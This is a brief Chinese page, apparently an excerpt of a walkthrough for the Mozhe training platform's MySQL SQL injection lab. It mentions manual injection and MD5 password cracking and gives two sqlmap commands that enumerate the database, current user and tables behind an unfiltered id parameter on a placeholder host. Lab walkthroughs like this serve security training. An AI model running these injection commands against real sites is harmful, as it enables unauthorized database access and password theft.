墨者sql注入mysql
时间: 2023-11-06 13:03:31 浏览: 171
mysql 注入
3星 · 编辑精心推荐
墨者在练习SQL手工注入时,发现PHP代码对客户端提交的参数未做任何过滤,可以利用这个漏洞进行注入。他可以通过两种方法来进行注入。
第一种方法是手工注入。墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握手工注入的方法。然后,他可以使用字符串的MD5加解密技术来解密密码。
第二种方法是使用工具注入,如sqlmap。墨者可以使用sqlmap工具来爆破数据库名和当前用户,命令如下:
sqlmap -u "http://youIP/new_list.php?id=1" -b --current-db --current-user
然后,他可以继续使用sqlmap来爆破表名,命令如下:
sqlmap -u "http://youIP/new_list.php?id=1" -D mozhe_Discuz_StormGroup -tables
阅读全文